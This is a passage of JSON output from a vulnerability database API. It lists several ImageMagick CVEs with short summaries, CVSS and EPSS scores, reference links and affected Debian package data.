"5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3596.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-3596", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00173", "scoring_system": "epss", "scoring_elements": "0.38501", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00173", "scoring_system": "epss", "scoring_elements": "0.38739", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00173", "scoring_system": "epss", "scoring_elements": "0.38712", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00173", "scoring_system": "epss", "scoring_elements": "0.38759", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00173", "scoring_system": "epss", "scoring_elements": "0.38736", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00173", "scoring_system": "epss", "scoring_elements": "0.38658", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00174", "scoring_system": "epss", "scoring_elements": "0.38802", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00174", "scoring_system": "epss", "scoring_elements": "0.38825", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00174", "scoring_system": "epss", "scoring_elements": "0.38675", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00174", "scoring_system": "epss", "scoring_elements": "0.38813", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00174", "scoring_system": "epss", "scoring_elements": "0.38804", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00174", "scoring_system": "epss", "scoring_elements": "0.38824", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00174", "scoring_system": "epss", "scoring_elements": "0.38752", "published_at": "2026-04-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-3596" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3596", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3596" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1970569", "reference_id": "1970569", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1970569" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-3596" ], "risk_score": 2.4, "exploitability": "0.5", "weighted_severity": "4.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pmpn-drv8-9ude" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80753?format=api", "vulnerability_id": "VCID-psf6-cvdn-h3b1", "summary": "ImageMagick: heap buffer overflow in coders/tiff.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27829.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27829.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27829", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.3589", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.36081", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.3611", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.35946", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.35996", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.36018", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.36025", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.35987", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.35961", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.36", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.35986", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.35935", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00153", "scoring_system": "epss", "scoring_elements": "0.35706", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27829" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27829", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27829" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922525", "reference_id": "1922525", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922525" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27829" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-psf6-cvdn-h3b1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81981?format=api", "vulnerability_id": "VCID-ptej-pfyn-z3aq", "summary": "ImageMagick: outside the range of representable values of type 'unsigned long' at MagickCore/statistic.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27766.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27766.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27766", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.33162", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.33289", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.33322", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.33154", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.33198", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.3323", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.33232", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.33193", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.3317", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.3321", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.33188", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.33151", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00135", "scoring_system": "epss", "scoring_elements": "0.33005", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27766" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27766", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27766" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894686", "reference_id": "1894686", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894686" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27766" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ptej-pfyn-z3aq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82457?format=api", "vulnerability_id": "VCID-q3v4-jztv-9bbs", "summary": "imagemagick: memory leak vulnerability in function WriteDPXImage in coders/dpx.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12975.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12975.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31584", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31845", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31806", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31771", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31803", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31782", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00125", "scoring_system": "epss", "scoring_elements": "0.31752", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32301", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32202", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32263", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32134", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32126", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00128", "scoring_system": "epss", "scoring_elements": "0.32175", "published_at": "2026-04-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": 